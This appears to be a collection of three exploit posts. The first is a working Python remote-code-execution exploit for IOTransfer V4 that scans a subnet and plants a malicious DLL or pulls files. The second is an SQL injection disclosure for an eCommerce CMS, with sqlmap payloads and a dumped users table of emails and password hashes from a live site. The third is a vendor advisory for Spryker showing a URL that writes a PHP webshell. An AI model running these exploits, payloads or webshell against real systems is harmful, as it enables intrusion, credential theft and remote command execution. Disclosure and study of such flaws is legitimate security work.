<pre><code># Exploit Title: IOTransfer V4 – Remote Code Execution (RCE)<br /># Date: 06/22/2022<br /># Exploit Author: Tomer Peled<br /># Vendor Homepage: https://www.iobit.com<br /># Software Link: https://iotransfer.itopvpn.com/<br /># Version: V4 and onward<br /># Tested on: Windows 10<br /># CVE : 2022-24562<br /># References: https://github.com/tomerpeled92/CVE/tree/main/CVE-2022%E2%80%9324562<br /><br />import os<br />from urllib3.exceptions import ConnectTimeoutError<br />from win32com.client import *<br />import requests<br />import json<br /><br />localPayloadPath = r"c:\temp\malicious.dll"<br />remotePayloadPath="../Program Files (x86)/Google/Update/goopdate.dll"<br />remoteDownloadPath = r'C:\Users\User\Desktop\obligationservlet.pdf'<br />Range = "192.168.89"<br />UpOrDown="Upload"<br />IP = ""<br />UserName = ""<br /><br />def get_version_number(file_path):<br /> information_parser = Dispatch("Scripting.FileSystemObject")<br /> version = information_parser.GetFileVersion(file_path)<br /> return version<br /><br /><br />def getTaskList(IP, taskid=""):<br /> print("Getting task list...")<br /> url = f'http://{IP}:7193/index.php?action=gettasklist&userid=*'<br /> res = requests.get(url)<br /> tasks = json.loads(res.content)<br /> tasks = json.loads(tasks['content'])<br /> for task in tasks['tasks']:<br /> if taskid == task['taskid']:<br /> print(f"Task ID found: {taskid}")<br /><br /><br />def CreateUploadTask(IP):<br /> SetSavePath(IP)<br /> url = f'http://{IP}:7193/index.php?action=createtask'<br /> task = {<br /> 'method': 'get',<br /> 'version': '1',<br /> 'userid': '*',<br /> 'taskstate': '0',<br /> }<br /> res = requests.post(url, json=task)<br /> task = json.loads(res.content)<br /> task = json.loads(task['content'])<br /> taskid = task['taskid']<br /> print(f"[*] TaskID: {taskid}")<br /> return taskid<br /><br /><br />def CreateUploadDetailNode(IP, taskid, remotePath, size='100'):<br /> url = f'http://{IP}:7193/index.php?action=settaskdetailbyindex&userid=*&taskid={taskid}&index=0'<br /> file_info = {<br /> 'size': size,<br /> 'savefilename': remotePath,<br /> 'name': remotePath,<br /> 'fullpath': r'c:\windows\system32\calc.exe',<br /> 'md5': 'md5md5md5md5md5',<br /> 'filetype': '3',<br /> }<br /> res = requests.post(url, json=file_info)<br /> js = json.loads(res.content)<br /> print(f"[V] Create Detail returned: {js['code']}")<br /><br /><br />def readFile(Path):<br /> file = open(Path, "rb")<br /> byte = file.read(1)<br /> next = "Start"<br /> while next != b'':<br /> byte = byte + file.read(1023)<br /> next = file.read(1)<br /> if next != b'':<br /> byte = byte + next<br /> file.close()<br /> return byte<br /><br /><br />def CallUpload(IP, taskid, localPayloadPath):<br /> url = f'http://{IP}:7193/index.php?action=newuploadfile&userid=*&taskid={taskid}&index=0'<br /> send_data = readFile(localPayloadPath)<br /> try:<br /> res = requests.post(url, data=send_data)<br /> js = json.loads(res.content)<br /> if js['code'] == 200:<br /> print("[V] Success payload uploaded!")<br /> else:<br /> print(f"CreateRemoteFile: {res.content}")<br /> except:<br /> print("[*] Reusing the task...")<br /> res = requests.post(url, data=send_data)<br /> js = json.loads(res.content)<br /> if js['code'] == 200 or "false" in js['error']:<br /> print("[V] Success payload uploaded!")<br /> else:<br /> print(f"[X] CreateRemoteFile Failed: {res.content}")<br /><br /><br />def SetSavePath(IP):<br /> url = f'http://{IP}:7193/index.php?action=setiotconfig'<br /> config = {<br /> 'tasksavepath': 'C:\\Program '<br /> }<br /> requests.post(url, json=config)<br /><br />def ExploitUpload(IP,payloadPath,rPath,taskid =None):<br /> if not taskid:<br /> taskid = CreateUploadTask(IP)<br /> size = os.path.getsize(payloadPath)<br /> CreateUploadDetailNode(IP, taskid, remotePath=rPath, size=str(size))<br /> CallUpload(IP, taskid, payloadPath)<br /><br /><br />def CreateDownloadTask(IP, Path) -> str:<br /> url = f'http://{IP}:7193/index.php?action=createtask'<br /> task = {<br /> 'method': 'get',<br /> 'version': '1',<br /> 'userid': '*',<br /> 'taskstate': '0',<br /> 'filepath': Path<br /> }<br /> res = requests.post(url, json=task)<br /> task = json.loads(res.content)<br /> task = json.loads(task['content'])<br /> taskid = task['taskid']<br /> print(f"TaskID: {taskid}")<br /> return taskid<br /><br /><br />def ExploitDownload(IP, DownloadPath, ID=None):<br /> if ID:<br /> url = f'http://{IP}:7193/index.php?action=downloadfile&userid=*&taskid={ID}'<br /> else:<br /> taskid = CreateDownloadTask(IP, DownloadPath)<br /> url = f'http://{IP}:7193/index.php?action=downloadfile&userid=*&taskid={taskid}'<br /> res = requests.get(url)<br /> return res<br /><br />def ScanIP(startRange):<br /> print("[*] Searching for vulnerable IPs", end='')<br /> Current = 142<br /> IP = f"{startRange}.{Current}"<br /> VulnerableIP: str = ""<br /> UserName: str = ""<br /> while Current < 252:<br /> print(".", end='')<br /> url = f'http://{IP}:7193/index.php?action=getpcname&userid=*'<br /> try:<br /> res = requests.get(url, timeout=1)<br /> js = json.loads(res.content)<br /> js2 = json.loads(js['content'])<br /> UserName = js2['name']<br /> VulnerableIP=IP<br /> print(f"\n[V] Found a Vulnerable IP: {VulnerableIP}")<br /> print(f"[!] Vulnerable PC username: {UserName}")<br /> return VulnerableIP,UserName<br /> except Exception as e:<br /> pass<br /> except ConnectTimeoutError:<br /> pass<br /> IP = f"{startRange}.{Current}"<br /> Current = Current + 1<br /> return None,None<br /><br /><br />if __name__ == '__main__':<br /> IP,UserName = ScanIP(Range)<br /> if IP is None or UserName is None:<br /> print("[X] No vulnerable IP found")<br /> exit()<br /> print("[*] Starting Exploit...")<br /> if UpOrDown == "Upload":<br /> print(f"[*]Local Payload Path: {localPayloadPath}")<br /> print(f"[*]Remote Upload Path: {remotePayloadPath}")<br /> ExploitUpload(IP,localPayloadPath,remotePayloadPath)<br /> elif UpOrDown == "Download":<br /> print(f"[*] Downloading the file: {remoteDownloadPath}")<br /> res = ExploitDownload(IP, remoteDownloadPath)<br /> file = open("out.pdf", "wb+")<br /> file.write(res.content)<br /> file.close()<br /> <br /></code></pre>
<pre><code>┌┌────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr │ │ :<br />│ Website : mybizcms.com │ │ │<br />│ Vendor : mybizcms │ │ │<br />│ Software : Emporium eCommerce - │ │ │<br />│ Online Shopping CMS v 1.2 │ │ Emporium eCommerce │<br />│ Vuln Type: Remote SQL Injection │ │ │<br />│ Method : GET │ │ is a complete online │<br />│ Critical : High [░░▒▒▓▓██] │ │ shopping platform for all your needs │<br />│ Impact : Database Access │ │ │<br />│ │ │ │<br />│ ────────────────────────────────────────┘ └─────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Typically used for remotely exploitable vulnerabilities that can lead to │<br />│ system compromise. │<br />│ │<br />┌┌────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /> Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk<br /> loool, DevS, Dark-Gost<br /> CryptoJob (Twitter) twitter.com/CryptozJob<br />┌┌────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />There's 4 parameters Vulnerable to SQL Injection in /categories/other-categories?<br /><br /><br />GET parameter 'min_price' is vulnerable<br /><br />---<br />Parameter: min_price (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)<br /> Payload: min_price=(UPDATEXML(5880,CONCAT(0x2e,0x7176787a71,(SELECT (ELT(5880=5880,1))),0x716b707071),2936))&max_price=145000&storage[]=41<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)<br /> Payload: min_price=(SELECT 3031 FROM (SELECT(SLEEP(5)))qWqF)&max_price=145000&storage[]=41<br />---<br /><br />GET parameter 'percentage' is vulnerable.<br /><br />---<br />Parameter: percentage (GET)<br /> Type: boolean-based blind<br /> Title: MySQL boolean-based blind - Parameter replace (MAKE_SET)<br /> Payload: percentage=MAKE_SET(4728=4728,5649)<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: percentage=40 AND (SELECT 8890 FROM(SELECT COUNT(*),CONCAT(0x7170706b71,(SELECT (ELT(8890=8890,1))),0x717a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: percentage=40 AND (SELECT 9724 FROM (SELECT(SLEEP(5)))chdS)<br />---<br /><br />GET parameter 'review_ratings' is vulnerable<br /><br />---<br />Parameter: review_ratings (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: review_ratings=4 AND (SELECT 5450 FROM(SELECT COUNT(*),CONCAT(0x7170706b71,(SELECT (ELT(5450=5450,1))),0x717a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: review_ratings=4 AND (SELECT 2340 FROM (SELECT(SLEEP(5)))lpXn)<br />---<br /><br />GET parameter 'brand[]' is vulnerable<br /><br />---<br />Parameter: brand[] (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: brand[]=15') AND 3512=3512 AND ('Othl'='Othl<br /><br /> Type: stacked queries<br /> Title: MySQL >= 5.0.12 stacked queries (comment)<br /> Payload: brand[]=15');SELECT SLEEP(5)#<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: brand[]=15') AND (SELECT 9038 FROM (SELECT(SLEEP(5)))hyaE) AND ('KJgc'='KJgc<br />---<br /><br />Live Demo Site:<br /><br />https://mybizcms.com/demos/multivendor/<br /><br /><br />[+] Starting the Attack<br /><br />sqlmap.py -u "https://mybizcms.com/demos/multivendor/categories/other-categories?brand%5B%5D=15" --current-db --batch --random-agent<br /><br />[INFO] the back-end DBMS is MySQL<br />web application technology: Apache, PHP 7.3.33, PHP<br />back-end DBMS: MySQL >= 5.0 (MariaDB fork)<br />[INFO] fetching current database<br />current database: 'mybizcms_multivendor'<br /><br /><br />fetching tables for database: 'mybizcms_multivendor'<br />[101 tables]<br /> <br />+--------------------------+<br />| returns |<br />| ad_placements |<br />| addresses |<br />| ads |<br />| attribute_items |<br />| attributes |<br />| authorize_net_settings |<br />| brands |<br />| categories |<br />| collections |<br />| company |<br />| counties |<br />| countries |<br />| credit_card_types |<br />| cronjobs |<br />| customers |<br />| deliveries |<br />| delivery_items |<br />| delivery_options |<br />| delivery_status |<br />| discounts |<br />| email_templates |<br />| facebook_settings |<br />| faqs |<br />| flash_sale_items |<br />| flash_sales |<br />| flutterwave_settings |<br />| github_settings |<br />| google_settings |<br />| item_status |<br />| labels |<br />| linkedin_settings |<br />| logs |<br />| media |<br />| mpesa_settings |<br />| newsletters |<br />| notifications |<br />| options |<br />| order_details |<br />| order_items |<br />| order_status |<br />| orders |<br />| pages |<br />| payment_options |<br />| payment_status |<br />| payments |<br />| payout_modes |<br />| payout_status |<br />| payouts |<br />| paypal_pro_settings |<br />| paypal_standard_settings |<br />| paytm_settings |<br />| payu_money_settings |<br />| permissions |<br />| pesapal_settings |<br />| pickup_stations |<br />| post_categories |<br />| post_comments |<br />| posts |<br />| product_attributes |<br />| product_images |<br />| product_reviews |<br />| product_stock |<br />| product_types |<br />| product_variants |<br />| product_wholesales |<br />| products |<br />| quicks |<br />| return_reasons |<br />| return_status |<br />| rewards |<br />| role_sub_permissions |<br />| roles |<br />| saved_items |<br />| sessions |<br />| shipping_fees |<br />| shipping_regions |<br />| shipping_weights |<br />| shops |<br />| sliders |<br />| stripe_settings |<br />| sub_permissions |<br />| subscribers |<br />| supported_currencies |<br />| tags |<br />| taxes |<br />| temp_data |<br />| ticket_priority |<br />| ticket_replies |<br />| ticket_status |<br />| tickets |<br />| timezones |<br />| twitter_settings |<br />| twocheckout_settings |<br />| user_status |<br />| user_sub_permissions |<br />| users |<br />| variant_choices |<br />| variant_options |<br />| wallets |<br />| weights |<br />+--------------------------+<br /> <br />fetching columns for table 'users' in database 'mybizcms_multivendor'<br /> <br />Table: users<br />[34 columns]<br /> <br />+------------------------+--------------+<br />| Column | Type |<br />+------------------------+--------------+<br />| calling_code | varchar(11) |<br />| city | varchar(100) |<br />| company | varchar(100) |<br />| country_id | int(11) |<br />| date_added | datetime |<br />| default_billing | int(11) |<br />| default_currency | int(11) |<br />| default_language | varchar(40) |<br />| default_shipping | int(11) |<br />| department_id | int(11) |<br />| email | varchar(100) |<br />| firstname | varchar(50) |<br />| last_ip | varchar(40) |<br />| last_login | datetime |<br />| last_password_change | datetime |<br />| lastname | varchar(50) |<br />| latitude | varchar(300) |<br />| longitude | varchar(300) |<br />| new_pass_key_requested | datetime |<br />| passkey | varchar(32) |<br />| password | varchar(256) |<br />| payout_address | longtext |<br />| payout_mode_id | int(11) |<br />| phone | varchar(30) |<br />| postal_code | varchar(100) |<br />| profile_image | varchar(150) |<br />| role_id | int(11) |<br />| state | varchar(50) |<br />| street | varchar(100) |<br />| user_id | int(11) |<br />| user_status_id | int(11) |<br />| user_uid | varchar(50) |<br />| username | varchar(100) |<br />| zip_code | varchar(15) |<br />+------------------------+--------------+<br /> <br />fetching entries of column(s) 'email,password,username' for table 'users' in database 'mybizcms_multivendor'<br /> <br />Database: mybizcms_multivendor<br />Table: users<br />[7 entries]<br /> <br />+----------+--------------------------------------------------------------+------------------------+<br />| username | password | email |<br />+----------+--------------------------------------------------------------+------------------------+<br />| admin | $2y$10$G1DsE2VvjMDBFvozlWr.X.H1dq.UgNhTYSrMHGftuollcDDr9OA2m | admin@mybizcms.com |<br />| one | $2y$10$G1DsE2VvjMDBFvozlWr.X.H1dq.UgNhTYSrMHGftuollcDDr9OA2m | evanskynot25@gmail.com |<br />| two | $2y$10$K27UTI0KPeP.N.6EzxED6eVgU6jcAJDq8vf.EuCxzGSEFdSyI/oeC | jdoe@gmail.con |<br />| umuruviq | $2y$10$SID3yybe763.xosi8qwqkOTG8baLQQpIVdfrYzqG9dTPhcTtVL5Bu | sync@mybizcms.com |<br />| three | $2y$10$iBnMAPE.3FDeivo2kYPhSerMS05TmbIZQ/bLD6FcmvCowStICaaw. | tew@gmail.com |<br />| user | $2y$10$eZ0/eOZ5R.Mwju4nCqIgHuaVnBosugt8ADjwMCDzQP6oUUH2l5NVK | user@mybizcms.com |<br />| tbjjrhls | $2y$10$XKA6hBkZlCAU3T7KcQm.7ubs06COQH4mCcGHmBMwzyYp016oBYoPe | vendor@mybizcms.com |<br />+----------+--------------------------------------------------------------+------------------------+<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>Title<br />=====<br /><br />SCHUTZWERK-SA-2022-003: Remote Command Execution in Spryker Commerce OS<br /><br />Status<br />======<br /><br />PUBLISHED<br /><br />Version<br />=======<br /><br />1.0<br /><br />CVE reference<br />=============<br /><br />CVE-2022-28888<br /><br />Link<br />====<br /><br />https://www.schutzwerk.com/en/43/advisories/schutzwerk-sa-2022-003/<br /><br />Text-only version:<br />https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2022-003.txt<br /><br />Affected products/vendor<br />========================<br /><br />Spryker Commerce OS by Spryker Systems GmbH, with spryker/http module < <br />1.7.0<br /><br />Summary<br />=======<br /><br />A predictable value is used to sign and verify special _fragment URLs in<br />Spryker Commerce OS with spryker/http module < 1.7.0. Attackers that can <br />guess<br />this value are able to generate valid _fragment URLs which allow calling PHP<br />methods, with certain restrictions. It could be demonstrated that this <br />allows<br />attackers to write arbitrary content to files on the file system, which, in<br />turn, allows for execution of arbitrary PHP commands in many setups and<br />therefore remote command execution.<br /><br />Risk<br />====<br /><br />The vulnerability allows attackers to execute arbitrary commands on an<br />operating system-level on systems where the Spryker Commerce OS is <br />installed.<br />In many cases, authentication is not necessary for successful <br />exploitation. If<br />attackers have already determined that Spryker Commerce OS is utilized <br />through<br />fingerprinting, checking for the presence of the vulnerability is <br />trivial. With<br />the ability to execute arbitrary commands, attacks can, for example, access<br />customer data of the affected shop.<br /><br />Description<br />===========<br /><br />A webshop that was recently assessed for security vulnerabilities by <br />SCHUTZWERK<br />was found to contain a remote command execution vulnerability. The <br />application<br />in scope is based on a framework by Spryker -- Spryker Commerce OS. <br />Spryker's<br />framework, in turn, is based on Symfony[0] and/or Silex[1].<br /><br />Symfony and Silex both support a special _fragment endpoint. This <br />feature was<br />analyzed by Ambionics Security[2] in 2020. In their write up, the feature is<br />described as follows:<br /><br /> One of Symfony's built-in features, made to handle ESI (Edge-Side<br /> Includes)[3], is the FragmentListener class[4]. Essentially, when someone<br /> issues a request to /_fragment, this listener sets request attributes <br />from<br /> given GET parameters. Since this allows to run arbitrary PHP code [...],<br /> the request has to be signed using a HMAC value. [...]<br /><br /> [...] Given its importance, [the secret used for signing] must <br />obviously be<br /> very random.<br /><br />At least parts of the source code of the Spryker framework are open <br />source and<br />publicly accessible via GitHub. During the assessment, while certain<br />security-sensitive parts of the source code were reviewed, it was discovered<br />that the secret used to sign and verify _fragment URLs is static and<br />predictable. The secret is set to md5(__DIR__) in the PHP file<br />HttpFragmentServiceProvider.php[5] and in two different HttpConfig.php[6][7]<br />files.<br /><br />__DIR__ is a built-in "magic constant" in PHP[8] and it corresponds to "the<br />directory of the file". It is not entirely clear, which of these PHP <br />files is<br />actually included and loaded by the Spryker framework. However, it is <br />assumed<br />that the file http/src/Spryker/Shared/Http/HttpConfig.php is the culprit.<br /><br />Guessing the secret<br />^^^^^^^^^^^^^^^^^^^<br /><br />In order to gain a better understanding of the vulnerability, SCHUTZWERK <br />set up<br />a local Spryker development instance with a demo shop[9] in order to <br />allow for<br />more in-depth debugging.<br /><br />By inspecting the source code and adding appropriate debug statements, the<br />secret was identified as e3ae11e53f7c3d72da08784b9af763f9. This <br />corresponds to<br />the MD5 sum of the path<br />/data/shop/development/current/vendor/spryker/http/src/Spryker/Shared/Http:<br /><br />$ echo -n '/data/shop/development/current/vendor/spryker/http/src/Spryker/'\<br />'Shared/Http'| md5sum<br />e3ae11e53f7c3d72da08784b9af763f9 -<br /><br />The proof-of-concept script find_secret.py[10] was developed in order to<br />automate the process of identifying the secret based on a list of known <br />Spryker<br />paths. The script was executed as follows against the local development<br />instance and correctly identified the static secret:<br /><br />$ python3 find_secret.py --path-list known_spryker_paths.txt \<br />http://www.de.b2b-demo-shop.local/_fragment<br />[-] http://www.de.b2b-demo-shop.local/_fragment <br />2c03fc8fac1ff5204b56d4dbf879a3fc<br />[-] http://www.de.b2b-demo-shop.local/_fragment <br />f71e9665ffe0a0e3b54bbe7c2642d466<br />[-] http://www.de.b2b-demo-shop.local/_fragment <br />faf0d063ad6adf3776d59bc55a17aa5f<br />[+] http://www.de.b2b-demo-shop.local/_fragment <br />e3ae11e53f7c3d72da08784b9af763f9<br /> <br />(/data/shop/development/current/vendor/spryker/http/src/Spryker/Shared/Http)<br /><br />This verification step does not require authentication in the default<br />configuration. The script generates _fragment URLs based on a provided <br />list of<br />paths and detects whether the server views these URLs as valid (correctly<br />signed) or not. This distinction is made based on different observations <br />(e.g.<br />status code, response content, etc.).<br /><br />The same script was then executed against the customer's instance:<br /><br />$ python3 find_secret.py --path-list known_spryker_paths.txt \<br />[CUSTOMER_DOMAIN]/_fragment<br />[-] [CUSTOMER_DOMAIN]/_fragment e3ae11e53f7c3d72da08784b9af763f9<br />[-] [CUSTOMER_DOMAIN]/_fragment faf0d063ad6adf3776d59bc55a17aa5f<br />[-] [CUSTOMER_DOMAIN]/_fragment 8399015c0dbbf2162983fb7ad0ea6a9a<br />[-] [CUSTOMER_DOMAIN]/_fragment 8baff412797b1ddd80cd968e7446aa06<br />[...]<br />[-] [CUSTOMER_DOMAIN]/_fragment 2c03fc8fac1ff5204b56d4dbf879a3fc<br />[-] [CUSTOMER_DOMAIN]/_fragment d6de8df0b4ad55b15f198e06142dd0e6<br />[-] [CUSTOMER_DOMAIN]/_fragment d6de8df0b4ad55b15f198e06142dd0e6<br />[+] [CUSTOMER_DOMAIN]/_fragment 9c15f40d8e5610e89caf6f9b7a97be3b<br /> (/data/srv/yves/www/vendor/spryker/http/src/Spryker/Shared/Http)<br /><br />In this case, the identified secret 9c15f40d8e5610e89caf6f9b7a97be3b<br />corresponds to the path<br />/data/srv/yves/www/vendor/spryker/http/src/Spryker/Shared/Http.<br /><br />The installation path of the application can of course vary greatly between<br />installations. However, if customers use the official Docker guide <br />provided by<br />Spryker, it is likely that they will use the paths utilized in the <br />examples and<br />thus share a common installation path.<br /><br />Even if this is not the case, customers might share installation paths <br />between<br />multiple environments (development, production). A compromise of one<br />installation would therefore make a compromise of the other installations<br />likely.<br /><br />Signing URLs<br />^^^^^^^^^^^^<br /><br />In addition to the secret, a URL must be passed to the HMAC function to form<br />the signature. However, in both instances of the vulnerability that were<br />discovered during the assessment, the URL was the same as the external URL.<br />This might be true for all Commerce OS installations.<br /><br />With a valid secret and a URL, it is now possible to sign URLs. As shown <br />in the<br />write up of Ambionics Security, it is generally possible to execute <br />arbitrary<br />commands using different methods (direct reference of a PHP class/method or<br />deserialization of PHP objects). However, both approaches did not work, <br />likely<br />due to code changes made by Spryker to Symfony/Silex.<br /><br />Generally, the correct syntax for _fragment URLs is the following:<br /><br /><protocol>://<domain>/_fragment?_path=_controller=<controller <br />specification>&<br />_hash=<valid URL signature><br /><br />Through further analysis, an alternative approach was discovered. <br />Replacing the<br />value of the URL parameter _path in the listing above allows to specify PHP<br />classes with certain limitations (decoded and reformatted for increased<br />readability):<br /><br />_controller[]=Path\To\Class&<br />_controller[]=nameOfMethod&<br />arg1=value<br /><br />At least the following limitations apply:<br /><br />* Class must have no initialize function or, alternatively, an initialize<br />function without arguments<br />* Class must have an constructor without arguments<br /><br />While examining the source code for possible candidates, the Symfony class<br />Filesystem was discovered. This class meets the limitations and allows <br />writing<br />arbitrary content to a specified file path. The following payload was <br />created<br />(decoded and reformatted for increased readability):<br /><br />_controller[]=Symfony\Component\Filesystem\Filesystem&<br />_controller[]=appendToFile&<br />filename=SCHUTZWERK.php&<br />content=TEST<br /><br />The generated URL is as follows:<br /><br />http://www.de.b2b-demo-shop.local/_fragment?_path=_controller%255B%255D%3DSymfony%255C<br />Component%255CFilesystem%255CFilesystem%26_controller%255B%255D%3DappendToFile%26<br />filename%3D%252Ftmp%252Fschutzwerk.php%26content%3DTEST&<br />_hash=8Phw5nGDW%2FDgLe%2Fvpep0Exzz%2BIsptnd%2FyOb4G5CT12U%3D<br /><br />After execution, the content is written to the file:<br /><br />vagrant@vm-b2b-demo-shop / $ cat /tmp/schutzwerk.php<br />TEST<br /><br />With this primitive in place, it is possible to execute arbitrary PHP <br />code and<br />subsequently commands on an operating system level. To demonstrate this, the<br />following PHP code for a minimal webshell was appended to the file<br />/data/shop/development/current/public/Yves/maintenance/maintenance.php <br />in the<br />development instance:<br /><br />if(isset($_GET['pass'])){<br /> if($_GET['pass']=="yunn@swervIfUf3"){<br /> if(isset($_REQUEST['cmd'])){<br /> echo "<pre>";<br /> $cmd=($_REQUEST['cmd']);<br /> system($cmd);<br /> echo "</pre>";<br /> die;<br /> }<br /> }<br />}<br /><br />The generated URL is as follows:<br /><br />http://www.de.b2b-demo-shop.local/_fragment?_path=_controller%255B%255D%3DSymfony%255C<br />Component%255CFilesystem%255CFilesystem%26_controller%255B%255D%3DappendToFile%26<br />filename%3D%252Fdata%252Fshop%252Fdevelopment%252Fcurrent%252Fpublic%252FYves%252F<br />maintenance%252Fmaintenance.php%26content%3Dif%2528isset%2528%2524_GET%255B%2527pass<br />%2527%255D%2529%2529%257B%250A%2B%2Bif%2528%2524_GET%255B%2527pass%2527%255D%253D%25<br />3D%2522yunn@swervIfUf3%2522%2529%257B%250A%2B%2B%2B%2Bif%2528isset%2528%2524<br />_REQUEST%255B%2527cmd%2527%255D%2529%2529%257B%250A%2B%2B%2B%2B%2B%2Becho%2B%2522%253Cpre<br />%253E%2522%253B%250A%2B%2B%2B%2B%2B%2B%2524cmd%253D%2528%2524_REQUEST%255B%2527cmd%2527<br />%255D%2529%253B%250A%2B%2B%2B%2B%2B%2Bsystem%2528%2524cmd%2529%253B%250A%2B%2B%2B%2B%2B<br />%2Becho%2B%2522%253C%252Fpre%253E%2522%253B%250A%2B%2B%2B%2B%2B%2Bdie%253B%250A%2B%2B%2B<br />%2B%257D%250A%2B%2B%257D%250A%257D&_hash=XAnTzw2Y6hhbyIwO7KQ9qdTHrFMQ%2BUKWrVqRCad6JHE%3D<br /><br />Afterwards, the file contains the following content:<br /><br /><?php<br />[...]<br />if (file_exists(__DIR__ . '/maintenance.marker')) {<br /> http_response_code(503);<br /> echo file_get_contents(__DIR__ . '/index.html');<br /> exit(0);<br />}<br />if(isset($_GET['pass'])){<br />if($_GET['pass']=="yunn@swervIfUf3"){<br /> if(isset($_REQUEST['cmd'])){<br /> echo "<pre>";<br /> $cmd=($_REQUEST['cmd']);<br /> system($cmd);<br /> echo "</pre>";<br /> die;<br /> }<br />}<br />}<br /><br />Since the PHP file maintenance.php is consulted for every request, the <br />injected<br />PHP webshell code can be executed using URLs similar to the following:<br /><br />http://www.de.b2b-demo-shop.local/?pass=yunn@swervIfUf3&cmd=id<br /><br />Solution/Mitigation<br />===================<br /><br />1. Update spryker/http module to version 1.7.0<br />2. Configure SPRYKER_ZED_REQUEST_TOKEN environment variable with a long, <br />random<br />and secure string<br /><br />Disclosure timeline<br />===================<br /><br />2022-04-07: Vulnerability discovered<br />2022-04-07: Initial contact with vendor<br />2022-04-08: Vulnerability reported to vendor<br />2022-04-08: CVE-2022-28888 assigned by MITRE<br />2022-04-11: Vendor notifies customers about vulnerability, releases patch<br />2022-04-26: Requested update from vendor<br />2022-05-05: Requested update from vendor<br />2022-06-20: Notified vendor of intention to publish advisory on 20220-06-30<br />2022-06-22: Vendor confirms that customers were notified about the <br />vulnerability<br />2022-07-12: Advisory published by SCHUTZWERK<br /><br />Contact/Credits<br />===============<br /><br />The vulnerability was discovered during an assessment by David Brown and<br />Marcelo Reyes of SCHUTZWERK GmbH.<br /><br />References<br />==========<br /><br />[0] https://symfony.com<br />[1] https://github.com/silexphp/Silex<br />[2] https://www.ambionics.io/blog/symfony-secret-fragment<br />[3] https://en.wikipedia.org/wiki/Edge_Side_Includes<br />[4] <br />https://github.com/symfony/symfony/blob/ac236517cc8925110d2ec9c35cfdb682a7b82f06/src/Symfony/Component/HttpKernel/EventListener/FragmentListener.php<br />[5] <br />https://github.com/spryker/silexphp/blob/94d2afc9b1ed9662193985cad1ba47da33bdc80d/src/Silex/Provider/HttpFragmentServiceProvider.php#L75<br />[6] <br />https://github.com/spryker/http/blob/56313eaff6594821849846d1b93e0b7eba9a09b6/src/Spryker/Shared/Http/HttpConfig.php#L29<br />[7] <br />https://github.com/spryker/spryker-core/blob/88ab823143b5521b4e1bb1b930321ec39eb4ec1e/Bundles/Http/src/Spryker/Shared/Http/HttpConfig.php#L29<br />[8] https://www.php.net/manual/en/language.constants.magic.php<br />[9] <br />https://docs.spryker.com/docs/scos/dev/setup/installing-spryker-with-development-virtual-machine/installing-spryker-with-devvm-on-macos-and-linux.html<br />[10] https://www.schutzwerk.com/en/43/assets/advisories/find_secret.py<br /><br />Disclaimer<br />==========<br /><br />The information provided in this security advisory is provided "as is" and<br />without warranty of any kind. Details of this security advisory may be <br />updated<br />in order to provide as accurate information as possible. The most recent<br />version of this security advisory can be found at SCHUTZWERK GmbH's website<br />( https://www.schutzwerk.com ).<br /><br /><br />-- <br />SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany<br /><br />Phone +49 731 977 191 0<br />Fax +49 731 977 191 99<br />Mobile +49 171 337 2701<br /><br />advisories@schutzwerk.com / www.schutzwerk.com<br /><br />Geschäftsführer / Managing Directors:<br />Jakob Pietzka, Michael Schäfer<br /><br />Amtsgericht Ulm / HRB 727391<br /></code></pre>
